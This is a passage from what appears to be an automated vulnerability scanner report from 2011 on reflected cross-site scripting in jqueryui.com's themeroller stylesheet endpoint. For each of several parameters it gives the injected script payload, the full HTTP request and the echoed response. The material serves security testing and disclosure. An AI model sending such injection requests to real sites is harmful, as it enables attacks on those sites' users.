Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:29 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 18344


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px6bcef<script>alert(1)</script>c81373b8746&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

3.126. http://jqueryui.com/themeroller/css/parseTheme.css.php [ctl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the ctl request parameter is copied into the HTML document as plain text between tags. The payload ff82e<script>alert(1)</script>ca3ce063aa0 was submitted in the ctl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themerollerff82e<script>alert(1)</script>ca3ce063aa0&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:28 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17278


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify this theme, visit http://jqueryui.com/themeroller/?ctl=themerollerff82e<script>alert(1)</script>ca3ce063aa0&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=
...[SNIP]...

3.127. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcActive request parameter is copied into the HTML document as plain text between tags. The payload c5b7b<script>alert(1)</script>716f2567758 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121c5b7b<script>alert(1)</script>716f2567758&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e"><script>alert(1)</script>7a510e251a9&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:53:03 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17499


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ss.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121c5b7b<script>alert(1)</script>716f2567758&iconColorActive=454545&bgColorHighlight=fbf9ee84d7e
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget
...[SNIP]...

3.128. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcContent request parameter is copied into the HTML document as plain text between tags. The payload 3ef0a<script>alert(1)</script>b19580104ec was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222223ef0a<script>alert(1)</script>b19580104ec&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:32 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222223ef0a<script>alert(1)</script>b19580104ec&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover
...[SNIP]...

3.129. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcDefault request parameter is copied into the HTML document as plain text between tags. The payload 85413<script>alert(1)</script>721d2b2bd14 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=55555585413<script>alert(1)</script>721d2b2bd14&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:34 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
pacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=55555585413<script>alert(1)</script>721d2b2bd14&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d
*/


/* Component co
...[SNIP]...

3.130. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcHeader request parameter is copied into the HTML document as plain text between tags. The payload 4be2a<script>alert(1)</script>b9f0265ae0b was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=2222224be2a<script>alert(1)</script>b9f0265ae0b&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:30 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=2222224be2a<script>alert(1)</script>b9f0265ae0b&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefau
...[SNIP]...

3.131. http://jqueryui.com/themeroller/css/parseTheme.css.php [fcHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the fcHover request parameter is copied into the HTML document as plain text between tags. The payload b04a7<script>alert(1)</script>bbbf43f1841 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121b04a7<script>alert(1)</script>bbbf43f1841&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:36 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17360


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121b04a7<script>alert(1)</script>bbbf43f1841&iconColorHover=454545&bgColorActive=ffffff2240d
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget inp
...[SNIP]...

3.132. http://jqueryui.com/themeroller/css/parseTheme.css.php [ffDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The value of the ffDefault request parameter is copied into the HTML document as plain text between tags. The payload 22354<script>alert(1)</script>88ba43d4577 was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif22354<script>alert(1)</script>88ba43d4577&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorH